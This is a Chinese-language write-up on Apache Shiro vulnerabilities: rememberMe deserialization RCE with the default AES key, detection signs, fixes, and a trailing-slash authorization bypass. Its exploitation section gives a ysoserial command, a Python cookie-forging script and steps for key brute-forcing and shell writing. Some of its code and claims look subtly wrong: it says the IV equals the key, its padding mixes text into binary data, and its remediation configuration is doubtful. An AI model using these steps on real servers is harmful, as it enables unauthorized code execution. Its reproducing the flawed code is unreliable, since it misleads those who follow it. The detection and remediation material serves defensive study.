shiro漏洞总结

1. 漏洞原理

Apache Shiro 是一个强大的 Java 安全框架，提供身份验证、授权、加密及会话管理功能。Shiro 使用 rememberMe 机制来存储用户会话信息，该机制依赖于加密后的 Cookie。当攻击者能够控制 Cookie 并且服务器使用了不安全的反序列化机制时，就可能造成远程代码执行（RCE）。

Shiro 反序列化漏洞的核心

Shiro 的 rememberMe 功能会在 Cookie 中存储用户的身份信息，该数据通常是通过 AES 加密的。

服务器在解析 rememberMe Cookie 时，会进行反序列化操作。

如果攻击者能够伪造 rememberMe Cookie，并利用不安全的 Java 反序列化机制，则可能导致远程代码执行。

Shiro 反序列化漏洞的关键点

默认密钥问题（Key Hardcoded）：

早期版本（如 Shiro 1.2.4）使用了默认的 AES 密钥 kPH+bIxk5D2deZiIxcaaaA==，攻击者可以利用该密钥解密 Cookie 并伪造恶意数据进行反序列化攻击。

Java 反序列化漏洞：

Shiro 反序列化时没有严格限制可反序列化的类，导致攻击者可以利用 CommonsCollections、Jdk7u21 等反序列化 gadget 进行 RCE。

2. 漏洞利用

Shiro 反序列化漏洞利用流程

获取 Shiro 版本和 AES 密钥

通过访问 rememberMe Cookie 确认目标是否使用 Shiro。

尝试使用 Shiro 默认密钥 kPH+bIxk5D2deZiIxcaaaA== 进行解密。

如果默认密钥无效，可以利用字典或爆破方式尝试其他密钥。

构造反序列化 payload

使用 ysoserial 工具生成恶意反序列化数据，如 CommonsCollections1:

          bash
          
java -jar ysoserial.jar CommonsCollections1 "calc.exe" > payload.bin

使用 AES 加密该 payload，并 Base64 编码后写入 rememberMe Cookie:

          python
          
        
from Crypto.Cipher import AES
import base64

key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")  # Shiro 默认密钥
iv = key  # Shiro 使用 CBC 模式，IV = key

def pad(s):  # PKCS7 补全
    return s + (16 - len(s) % 16) * chr(16 - len(s) % 16)

cipher = AES.new(key, AES.MODE_CBC, iv)
encrypted = base64.b64encode(cipher.encrypt(pad(open("payload.bin", "rb").read())))

print("rememberMe=" + encrypted.decode())

发送恶意 Cookie 触发 RCE

通过 Burp Suite 或手动修改 Cookie：

rememberMe=恶意Base64编码后的数据

访问目标网站，触发 Shiro 反序列化漏洞，执行远程命令。

3. 漏洞检测

1. 识别目标是否使用 Shiro

观察 HTTP 响应头：

Shiro 默认的 session ID 命名规则：

          
Set-Cookie: JSESSIONID=xxxx; Path=/; HttpOnly
Set-Cookie: rememberMe=deleteMe; Path=/; HttpOnly

rememberMe=deleteMe 可能表明目标使用 Shiro。

访问 /favicon.ico，如果返回 Shiro 默认的 favicon.ico，说明目标可能使用 Shiro：

curl -I http://target.com/favicon.ico

2. 检测是否存在 Shiro 反序列化漏洞

发送 rememberMe=deleteMe 观察是否被 Shiro 自动删除。

使用已知 AES 密钥加密测试 payload，观察目标是否执行恶意代码。

流量特征

在请求包的Cookie中为？remeberMe字段赋任意值

返回包中存在set-Cookie：remeberMe=deleteMe

URL中有shiro字样

有时候服务器不会主动返回remeberMe=deleteMe，直接发包即可

remenber me处含有大量的base字符或者是aes加密后的字符，并且返回包200状态码的，很有可能是被内存马注入或者在进行利用链爆破

攻击者成功webshell后，返回数据包的回显会会有$$$base64编码$$$字符

4. 修复方案

1. 升级 Shiro 版本

Shiro 1.2.5 及以上版本修复了默认密钥问题，建议升级到最新版本：

          xml
          
    org.apache.shiro
    shiro-core
    1.12.0

2. 修改 AES 密钥

避免使用 Shiro 默认密钥，修改 shiro.ini 或 shiro-config.properties：

          properties
          
shiro.crypto.key=<随机生成的 Base64 AES 密钥>

3. 使用更安全的序列化机制

使用 SimpleSession 代替 Java 反序列化：

          java
          
session.setAttribute("rememberMe", YOUR_SECURE_SERIALIZATION_METHOD);

采用 Kryo、JSON 等安全的序列化方式，避免 Java 反序列化漏洞。

4. 过滤危险类

采用 Java ObjectInputFilter 机制：

          java
          
ObjectInputFilter filter = ObjectInputFilter.Config.createFilter("!*;java.util.**;org.apache.shiro.**");

漏洞类型

linux出网环境

访问网址发现url存在shiro字眼，可以确认是shiro环境

通过修改cookie字段的信息，返回包那里含有rememberMe=deleteMe字段，说明存在shiro漏洞，直接上工具即可

linux不出网环境

不出网我们可以采用延迟来判断漏洞是否存在

通过脚本会尝试发送不同的密钥（Key）和利用链（Gadget），并观察服务器的响应时间。

如果服务器的响应时间比正常情况延迟了5秒，则说明该 key + gadget 组合有效，Shiro 存在反序列化漏洞。

如果某个key和gadget组合以及延时命令success生效了，就是存在的，还区分两个判断windows和linux，最后在写入shell后还对发送命令进行了base64编码后发送

apache shiro 权限绕过

漏洞的根本原因

shiro的URL拦截器中的路径匹配规则的存在设计缺陷

spring MVC处理URL时，会将/hello和/hello/视为相同的资源

漏洞复现

不可以访问/admin，但是可以访问/admin/

说明存在权限绕过，可以通过/路径/的形式访问未授权资源